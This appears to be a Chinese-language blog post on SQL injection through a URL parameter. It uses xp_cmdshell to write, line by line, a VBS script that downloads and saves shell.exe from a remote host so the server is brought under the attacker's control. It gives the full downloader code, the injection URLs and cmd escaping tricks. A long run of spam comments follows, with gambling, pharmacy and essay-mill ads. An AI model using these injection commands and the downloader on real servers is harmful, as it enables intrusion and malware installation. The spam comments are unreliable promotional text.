实战中,会遇到只能用url传递参数拿shell的情况。比如在xp_cmeshell下写入asp/aspx webshell,又或者写入vbs脚本来下载exe使主机上线。
写文件地址:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'echo data >> C:\out.txt';--这里用追加的方式写文件,data是我们要写入的数据。
下载远程文件的vbs代码
Set post=CreateObject("Msxml2.XMLHTTP")
post.Open "GET","http://x.x.x.x/shell.exe"
post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
wscript.sleep 3000
aGet.Write(post.responseBody)
aGet.SaveToFile "shell.exe",2在这个脚本中,有这些特殊符号:/=(“),.
经过测试,能够正常写入的有:
/
.
,
()
成对的"
xx=字符开头字符串对于单个的双引号,需要进行转义。Windows cmd下的转义字符是^。写入单引号需要这样转换一下:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'echo ^" >> C:\out.txt';--对于写入aGet.Mode = 3这样的数据,需要分两次写入,而且不能换行:
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'set /p="aGet.Mod" >> C:\out.txt';--
http://192.168.154.130/sql.asp?name=admin';exec xp_cmdshell 'set /p="e = 3" >> C:\out.txt';--这样两段字符串就写在了一行。
Very good post. Fantastic.
Very good blog article.Really looking forward to read more. Much obliged.
A round of applause for your blog. Awesome.
Hoktjb – 500 word research paper Httnzc qwffcr
Thank you for your article post. Great.
us essay writing services persuasive essay writing help
wow, awesome post.Thanks Again. Cool.
Say, you got a nice article.Really looking forward to read more. Much obliged.
I loved your article post.Really looking forward to read more. Fantastic.
I loved your blog post.Thanks Again. Really Great.
Wow, great article. Cool.
A big thank you for your blog post.Really looking forward to read more. Great.
Very good post.Really looking forward to read more. Will read on…
เดี๋ยวนี้ผู้คนต่างมองหาหนทางการผลิตรายได้ที่ลงทุนน้อย UFABET คาสิโนออนไลน์ได้เก็บทุกเกมออนไลน์ที่ท่านพอใจไม่ว่าจะเป็นบาคาร่า พนันบอล สล็อต ยิงปลา รวมถึงเกมใหม่ๆที่พึ่งพิงเปิดตัวเข้าสู่วงการเกมออนไลน์ UFABET จ่ายจริง จ่ายไว ไม่มีขั้นต่ะ
I really like and appreciate your article.Really looking forward to read more. Keep writing.
Awesome blog post.Really thank you! Awesome.
Jemand im Wesentlichen unterstützen, um ernst Artikel ich würde zu sagen . Dies das allererste Mal, dass ich Ihre Website-Seite besucht habe und so weit? Ich überrascht mit der Forschung, die Sie gemacht haben, um dieses tatsächlich machen posten erstaunlich. Großartig Job!
A round of applause for your blog post.Thanks Again.
Appreciate you sharing, great article.Really thank you! Really Great.
Very informative post.Really looking forward to read more. Fantastic.
Very good article.Really thank you! Will read on…
สล็อตออนไลน์เกมคาสิโนยอดนิยมชั่วกัลปวสาน เล่นง่าย แจ็คพอตแตกไวจำเป็นต้องที่ UFABET จ่ายจริง จ่ายเต็ม มีเกมให้เลือกมากมายทั้งพนันบอล บาคาร่า ยิงปลา มาเว็บไซต์นี้เว็บเดียวบอกเลยจ้าขอรับว่าโคตรคุ้ม สร้างรายได้กล้วยๆจบที่เว็บไซต์ UFABET ได้เลยคะครับผม
Appreciate you sharing, great post.Really looking forward to read more.
Awesome blog post.Really looking forward to read more. Much obliged.
Very good blog.Much thanks again. Really Great.
Super good article. I’ll return to view more. Thank you for creating it.
Thank you for your blog.Thanks Again. Really Cool.
nicee content keep writing
A big thank you for your blog article.Much thanks again. Cool.
Muchos Gracias for your post. Really Cool.
Really informative article. Great.
I really liked your article post. Awesome.
Say, you got a nice post. Really Great.
Really informative blog post.Really looking forward to read more. Cool.
Awesome article post.Really looking forward to read more. Great.
I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.
ivermectin 12
????? – ??? ?????????? ????????? ?? ??????? ????????, ?? ????? ????. ?????? ????????Loading…
trusted india online pharmacies medication from india – online pharmacy
Wow, great blog.Much thanks again. Really Great.
I couldn’t refrain from commenting. Very well written!
Muchos Gracias for your article.Much thanks again. Fantastic.
I really like and appreciate your article.Really looking forward to read more. Great.
I really like and appreciate your blog post. Great.
I really liked your blog article.Much thanks again.
Just stumble upon your blog from from time to time. nice article
I used to be able to find good info from your blog articles.
Very neat article post.Thanks Again. Really Cool.
Thank you for your post.Thanks Again. Want more.
apartments in longmont co apartments in titusville fl
Very neat article post.Really looking forward to read more. Much obliged.
It’s a comprehensive, yet fast read.
Really informative blog.Really thank you! Much obliged.
Good information. Lucky me I recently found your website by accident (stumbleupon). I have book marked it for later!
I really liked your blog.Really looking forward to read more. Really Great.
generic stromectol stromectol for humans for sale – stromectol otc
ivermectin nz stromectol for sale – ivermectin pills human
Awesome article.Thanks Again.
A big thank you for your blog post.Really thank you! Great.
Muchos Gracias for your article post.Really looking forward to read more. Will read on…
I loved your blog article.Much thanks again. Much obliged.
Thank so much for helping me.
I really admire your writing!
Thanks for sharing.
How can I get more helpful information?
How can I get more useful information?
Great information. Lucky me I ran across your blog by chance (stumbleupon). I’ve bookmarked it for later.
Thanks for sharing.
Very good info thanks so much!
Saved as a favorite, I really like your website.
Thank so much for helping me.
Thank you for your post.Really looking forward to read more. Want more.
Thank you ever so for you article.Much thanks again. Want more.
your won weblog.
Enjoyed every bit of your article.Thanks Again. Great.